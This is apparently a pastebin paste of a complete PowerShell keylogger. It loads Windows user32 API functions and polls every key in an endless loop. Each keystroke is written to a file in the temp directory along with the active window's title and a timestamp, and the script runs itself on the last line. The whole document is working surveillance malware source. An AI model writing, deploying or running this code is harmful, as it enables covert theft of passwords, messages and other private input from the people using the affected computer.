· 6 years ago · Jan 08, 2020, 09:46 AM
1$logger = {
2param($Path = "$env:tmp\logger.txt")
3
4 <#
5 .DESCRIPTION
6 By accessing the Windows low-level API functions, a script can constantly
7 monitor the keyboard for keypresses and log these to a file. This effectively produces a keylogger.
8 Run the function Start-Keylogger to start logging key presses. Once you
9 stop the script by pressing CTRL+C, the collected key presses are displayed
10
11 .NOTES
12 http://powershell.com/cs/blogs/tips/archive/2015/12/09/creating-simple-keylogger.aspx
13 #>
14 # Signatures for API Calls
15 $signatures = @'
16[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
17public static extern short GetAsyncKeyState(int virtualKeyCode);
18[DllImport("user32.dll", CharSet=CharSet.Auto)]
19public static extern int GetKeyboardState(byte[] keystate);
20[DllImport("user32.dll", CharSet=CharSet.Auto)]
21public static extern int MapVirtualKey(uint uCode, int uMapType);
22[DllImport("user32.dll", CharSet=CharSet.Auto)]
23public static extern int ToUnicodeEx(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags, IntPtr dwhkl);
24[DllImport("user32.dll", CharSet=CharSet.Auto)]
25public static extern IntPtr GetKeyboardLayout(int idThread);
26[DllImport("user32.dll", CharSet=CharSet.Auto)]
27public static extern IntPtr GetForegroundWindow();
28[DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError=true)]
29public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out int lpdwProcessId);
30[DllImport("user32.dll",CharSet=CharSet.Auto, SetLastError=true)]
31public static extern int GetWindowText(IntPtr hWnd, System.Text.StringBuilder lpString,int nMaxCount);
32[DllImport("user32.dll", CharSet=CharSet.Auto , SetLastError = true)]
33public static extern int GetWindowTextLength(IntPtr hwnd);
34'@
35
36 # load signatures and make members available
37 if($Script:API -eq $null){
38 $Script:API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
39 }
40 # create output file
41 # $null = New-Item -Path $Path -ItemType File -Force
42
43 try
44 {
45 # create endless loop. When user presses CTRL+C, finally-block
46 # executes and shows the collected key presses
47 while ($true)
48 {
49 Start-Sleep -Milliseconds 40
50
51 # scan all ASCII codes above 8
52 for ($ascii = 9; $ascii -le 254; $ascii++)
53 {
54 # get current key state
55 $state = $Script:API::GetAsyncKeyState($ascii)
56
57 # is key pressed?
58 if ($state -eq -32767)
59 {
60 $null = [console]::CapsLock
61
62 # translate scan code to real code
63 $virtualKey = $API::MapVirtualKey($ascii, 3)
64
65 # get keyboard state for virtual keys
66 $kbstate = New-Object Byte[] 256
67 $checkkbstate = $API::GetKeyboardState($kbstate)
68
69 # prepare a StringBuilder to receive input key
70 $mychar = New-Object -TypeName System.Text.StringBuilder
71
72 # translate virtual key
73 $myHwnd = $Script:API::GetForegroundWindow()
74 $length = $Script:API::GetWindowTextLength($myHwnd)
75 $sb = New-Object -TypeName System.Text.StringBuilder ($length + 1)
76
77
78 $Script:API::GetWindowText($myHwnd, $sb, $sb.Capacity) | Out-Null;
79 $sb = $sb.ToString()
80
81
82 $myPid = [IntPtr]::Zero
83
84 $myTid = $Script:API::GetWindowThreadProcessId($myHWND,[ref] $myPid)
85 $dwhkl = $Script:API::GetKeyboardLayout($myTid)
86 $success = $Script:API::ToUnicodeEx($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0,$dwhkl)
87
88 if ($success)
89 {
90
91 # add key to logger file
92 if ($mychar.ToString()-eq "`r") {
93 [System.IO.File]::AppendAllText($Path,"`r`n", [System.Text.Encoding]::Unicode)
94 } else {
95 if ($sb -eq $old_sb) {
96 [System.IO.File]::AppendAllText($Path,$mychar, [System.Text.Encoding]::Unicode)
97 } else {
98 [System.IO.File]::AppendAllText($Path, "`r`n" + '[' + $sb + '] [' + [System.DateTime]::Now.ToString() + ']' + "`r`n" + $mychar, [System.Text.Encoding]::Unicode)
99 $old_sb = $sb
100 }
101 }
102
103
104
105
106 }
107 }
108 }
109 }
110 }
111 finally
112 {
113
114 }
115}
116"log file :" + "$env:tmp\logger.txt"
117& $logger